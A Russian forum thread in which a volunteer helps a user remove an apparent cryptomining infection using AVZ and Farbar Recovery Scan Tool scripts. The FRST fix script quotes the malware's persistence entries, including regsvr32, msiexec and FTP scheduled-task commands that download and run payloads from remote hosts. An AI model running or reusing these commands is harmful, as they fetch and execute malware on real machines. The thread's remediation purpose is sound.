Форум программистов, компьютерный форум, киберфорум
Лечение компьютерных вирусов
Войти
Регистрация
Восстановить пароль
 
102 / 89 / 75
Регистрация: 04.11.2011
Сообщений: 1,811
1

Загружена видеокарта

03.11.2017, 01:24. Показов 437. Ответов 13
Метки нет (Все метки)

GPU постоянно используется на 100%, после перезагрузки в течении минут 2ух работает нормально, а после все по новой
0

Помощь в написании контрольных, курсовых и дипломных работ здесь.

Вложения
Тип файла: zip CollectionLog-2017.11.03-01.23.zip (87.8 Кб, 3 просмотров)
Programming
Эксперт
94731 / 64177 / 26122
Регистрация: 12.04.2006
Сообщений: 116,782
03.11.2017, 01:24
Ответы с готовыми решениями:

Загружена система
Уже около двух недель тормозят все приложения которые раньше работали без задержек. Заранее...

В простое видеокарты загружена на 99%
В субботу утром начал играть в Destiny 2 весь день играл все было нормально, запустил в воскресенье...

Загружена половина оперативки
Добрый день. Вчера скачал один файл, открыл его, и понеслось. Решал проблему: остановил...

Оперативная память при простое загружена на 60%
Здравствуйте. Столкнулся с такой проблемой. Оперативная память сразу после загрузки системы...

13
Вирусоборец
16230 / 13292 / 2352
Регистрация: 08.10.2012
Сообщений: 53,986
03.11.2017, 09:27 2
Здравствуйте!

Внимание! Рекомендации написаны специально для пользователя Xo6ut. Если рекомендации написаны не для вас, не используйте их - это может повредить вашей системе.
Если у вас похожая проблема - создайте тему в разделе Лечение компьютерных вирусов и выполните Правила запроса о помощи.
______________________________________________________

Закройте все программы, временно выгрузите антивирус, файерволл и прочее защитное ПО.
  1. Выполните скрипт в AVZ (Файл - Выполнить скрипт):

    Код
    begin
     ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
     TerminateProcessByName('c:\windows\syswow64\lsmos.exe');
     QuarantineFile('C:\ProgramData\Aebblnroq.psd', '');
     QuarantineFile('c:\windows\debug\item.dat', '');
     QuarantineFile('c:\windows\debug\ok.dat', '');
     QuarantineFile('c:\windows\help\lsmosee.exe', '');
     QuarantineFile('c:\windows\syswow64\lsmos.exe', '');
     QuarantineFile('D:\autoplay.exe', '');
     QuarantineFile('D:\autorun.inf', '');
     ExecuteFile('schtasks.exe', '/delete /TN "Mysa" /F', 0, 15000, true);
     ExecuteFile('schtasks.exe', '/delete /TN "Mysa1" /F', 0, 15000, true);
     ExecuteFile('schtasks.exe', '/delete /TN "Mysa2" /F', 0, 15000, true);
     ExecuteFile('schtasks.exe', '/delete /TN "Mysa3" /F', 0, 15000, true);
     ExecuteFile('schtasks.exe', '/delete /TN "ok" /F', 0, 15000, true);
     DeleteFile('C:\ProgramData\Aebblnroq.psd', '32');
     DeleteFile('c:\windows\debug\item.dat', '32');
     DeleteFile('c:\windows\debug\ok.dat', '32');
     DeleteFile('c:\windows\help\lsmosee.exe', '32');
     DeleteFile('c:\windows\syswow64\lsmos.exe', '32');
     RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start');
     RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start1');
     RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Services\Tomcat9\Parameters', 'ServiceDll');
     CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
    ExecuteSysClean;
     ExecuteWizard('SCU', 2, 3, true);
    RebootWindows(true);
    end.
    Компьютер перезагрузится.


  2. Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью формы вверху этой темы или с помощью этой формы.
    К сообщению прикреплять файл quarantine.zip не нужно!


  3. Подготовьте новый CollectionLog.
1
102 / 89 / 75
Регистрация: 04.11.2011
Сообщений: 1,811
03.11.2017, 14:22  [ТС] 3
Вот лог
0
Вложения
Тип файла: zip CollectionLog-2017.11.03-14.21.zip (88.3 Кб, 2 просмотров)
Вирусоборец
16230 / 13292 / 2352
Регистрация: 08.10.2012
Сообщений: 53,986
03.11.2017, 14:25 4
Карантин отправили?

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочками также "Shortcut.txt".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
(Если не помещаются, упакуйте).
Подробнее читайте в этом руководстве.
1
102 / 89 / 75
Регистрация: 04.11.2011
Сообщений: 1,811
04.11.2017, 09:52  [ТС] 5
Проблема вернулась
0
Вложения
Тип файла: rar frst.rar (43.4 Кб, 2 просмотров)
Вирусоборец
16230 / 13292 / 2352
Регистрация: 08.10.2012
Сообщений: 53,986
04.11.2017, 10:06 6
Мы еще не закончили.

Цитата Сообщение от Sandor Посмотреть сообщение
Карантин отправили?
Не ответили.
  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код
    Start::
    CreateRestorePoint:
    () C:\Windows\SysWOW64\lsmos.exe
    () C:\Windows\debug\lsmose.exe
    C:\Windows\SysWOW64\lsmos.exe
    C:\Windows\debug\lsmose.exe
    HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll <==== ATTENTION
    HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ATTENTION
    HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{1ec92180-151d-4ca5-a534-d2c52a470425} <==== ATTENTION (Restriction - IP)
    CHR DefaultSearchURL: Default -> chrome-extension://klbibkeccnjlkjkiokjodocebajanakg/suspended.html#ttl=%D0%B7%D0%B5%D1%80%D0%BA%D0%B0%D0%BB%D0%BE%20rutor.info%20%3A%3A%20%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&uri=hxxp://fast-bit.org/search/dragon+age+
    S2 Tomcat9; C:\Windows\System32\svchost.exe [27136 2009-07-14] (Microsoft Corporation) <==== ATTENTION (no ServiceDLL)
    S2 Tomcat9; C:\Windows\SysWOW64\svchost.exe [20992 2009-07-14] (Microsoft Corporation) <==== ATTENTION (no ServiceDLL)
    S2 fastuserswitchingcompatibility; C:\ProgramData\Application Data\Storm\update\%YOUSHIZHUAY%\bbubd.cc3 [X]
    2017-11-04 07:53 - 2017-11-04 07:56 - 007024640 _____ C:\Windows\SysWOW64\lsmos.exe
    2017-11-03 16:53 - 2017-11-04 07:53 - 000003502 _____ C:\Windows\System32\Tasks\Mysa3
    2017-11-03 16:53 - 2017-11-04 07:53 - 000003422 _____ C:\Windows\System32\Tasks\Mysa2
    2017-11-03 16:53 - 2017-11-04 07:53 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
    2017-11-03 16:53 - 2017-11-04 07:53 - 000003186 _____ C:\Windows\System32\Tasks\ok
    Task: {234C99F6-5082-4C47-92B9-592281436F1C} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
    Task: {3E80BFD3-0767-4D41-9111-AD474B6FE290} - System32\Tasks\Mysa3 => cmd /c echo open ftp.oo000oo.me>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
    Task: {67EFF2B5-4D06-4ED9-BB44-FFA077FC471B} - System32\Tasks\Mysa2 => cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
    Task: {FC78D143-83C3-438C-AA12-A4DF4BF19CCB} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
    WMI_ActiveScriptEventConsumer_****youmm2_consumer: <==== ATTENTION
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
1
102 / 89 / 75
Регистрация: 04.11.2011
Сообщений: 1,811
04.11.2017, 10:07  [ТС] 7
Извиняюсь, карантин отправил
0
Вирусоборец
16230 / 13292 / 2352
Регистрация: 08.10.2012
Сообщений: 53,986
04.11.2017, 10:11 8
Не дошел. Если отправляли через одну форму, продублируйте на другую.
1
102 / 89 / 75
Регистрация: 04.11.2011
Сообщений: 1,811
04.11.2017, 10:19  [ТС] 9
Карантин снова отправил
0
Вложения
Тип файла: rar Fixlog.rar (1.9 Кб, 3 просмотров)
Вирусоборец
16230 / 13292 / 2352
Регистрация: 08.10.2012
Сообщений: 53,986
04.11.2017, 10:29 10
На этот раз дошел, спасибо!

Что с проблемой?
1
102 / 89 / 75
Регистрация: 04.11.2011
Сообщений: 1,811
04.11.2017, 10:33  [ТС] 11
Пока вроде полет нормальный, спасибо.
0
Вирусоборец
16230 / 13292 / 2352
Регистрация: 08.10.2012
Сообщений: 53,986
04.11.2017, 10:36 12
Проверьте уязвимые места:
  • Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе
  • Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
  • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
  • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
  • Прикрепите этот файл к своему следующему сообщению.
0
102 / 89 / 75
Регистрация: 04.11.2011
Сообщений: 1,811
04.11.2017, 10:43  [ТС] 13
Вот лог
0
Вложения
Тип файла: txt SecurityCheck.txt (18.3 Кб, 3 просмотров)
Вирусоборец
16230 / 13292 / 2352
Регистрация: 08.10.2012
Сообщений: 53,986
04.11.2017, 10:47 14
------------------------------- [ Windows ] -------------------------------
Internet Explorer 8.0.7601.17514 Внимание! Скачать обновления
^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^
Контроль учётных записей пользователя отключен (Уровень 1)
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
Автоматическое обновление отключено (-1)
------------------------------- [ HotFix ] --------------------------------
HotFix KB3115858 Внимание! Скачать обновления
HotFix KB3140735 Внимание! Скачать обновления
HotFix KB3138910 Внимание! Скачать обновления
HotFix KB3138962 Внимание! Скачать обновления
HotFix KB3145739 Внимание! Скачать обновления
HotFix KB3146963 Внимание! Скачать обновления
HotFix KB3156013 Внимание! Скачать обновления
HotFix KB3156016 Внимание! Скачать обновления
HotFix KB3156019 Внимание! Скачать обновления
HotFix KB3155178 Внимание! Скачать обновления
HotFix KB3153171 Внимание! Скачать обновления
HotFix KB3170455 Внимание! Скачать обновления
HotFix KB3178034 Внимание! Скачать обновления
HotFix KB3185911 Внимание! Скачать обновления
HotFix KB3184122 Внимание! Скачать обновления
HotFix KB3192391 Внимание! Скачать обновления
HotFix KB3197867 Внимание! Скачать обновления
HotFix KB3205394 Внимание! Скачать обновления
HotFix KB4012212 Внимание! Скачать обновления
HotFix KB4019263 Внимание! Скачать обновления
HotFix KB4022722 Внимание! Скачать обновления
HotFix KB4015546 Внимание! Скачать обновления
HotFix KB4025337 Внимание! Скачать обновления
HotFix KB4034679 Внимание! Скачать обновления
HotFix KB4041678 Внимание! Скачать обновления
--------------------------- [ OtherUtilities ] ----------------------------
Oracle VM VirtualBox 4.1.4 v.4.1.4 Внимание! Скачать обновления
--------------------------------- [ P2P ] ---------------------------------
µTorrent v.3.5.0.43804 Внимание! Клиент сети P2P! Может содержать рекламные модули или использоваться для скачивания нежелательного контента.
-------------------------------- [ Java ] ---------------------------------
Java 8 Update 151 (64-bit) v.8.0.1510.12 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jre-8u152-windows-x64.exe)^
Java SE Development Kit 8 Update 131 (64-bit) v.8.0.1310.11 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jdk-8u152-windows-x64.exe)^
Java 8 Update 151 v.8.0.1510.12 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jre-8u152-windows-i586.exe)^
--------------------------- [ AppleProduction ] ---------------------------
iTunes v.12.6.1.25 Внимание! Скачать обновления
^Для проверки новой версии используйте приложение Apple Software Update^
--------------------------- [ AdobeProduction ] ---------------------------
Adobe Flash Player 26 NPAPI v.26.0.0.126 Внимание! Скачать обновления


Рекомендации после удаления вредоносного ПО
0
IT_Exp
Эксперт
87844 / 49110 / 22898
Регистрация: 17.06.2006
Сообщений: 92,604
04.11.2017, 10:47

Помощь в написании контрольных, курсовых и дипломных работ здесь.

Система постоянно чем то загружена, идет процесс непонятный
Помогите пожалуйста, система постоянно выполняет какой-то процесс, в диспетчере задач ничего не...

В браузере периодически открываются страницы и оперативная память загружена до 100%
Здравствуйте, у меня возникли 2 проблемы: 1. В браузере во время его использования вместе со...

Загружена оперативка
При запуске винды оператива грузится на 1.5-2гб,но после 2-3 часов работы и запуска различных...

ОЗУ загружена на 50% 24/7
Что-то очень сильно жрёт ОЗУ сразу после запуска ПК. Пробовал через диспетчер задач и монитор...

Оперативная память загружена на 65 %
Помогите пожалуйста, оперативная память компьютера занята на 80%(8 гб) При том не видно, чтобы...

Загружена оперативная память
Я в компьютерах не разбираюсь поэтому приму любую помощь и любые советы.На наличие вирусов я...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
14
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2021, vBulletin Solutions, Inc.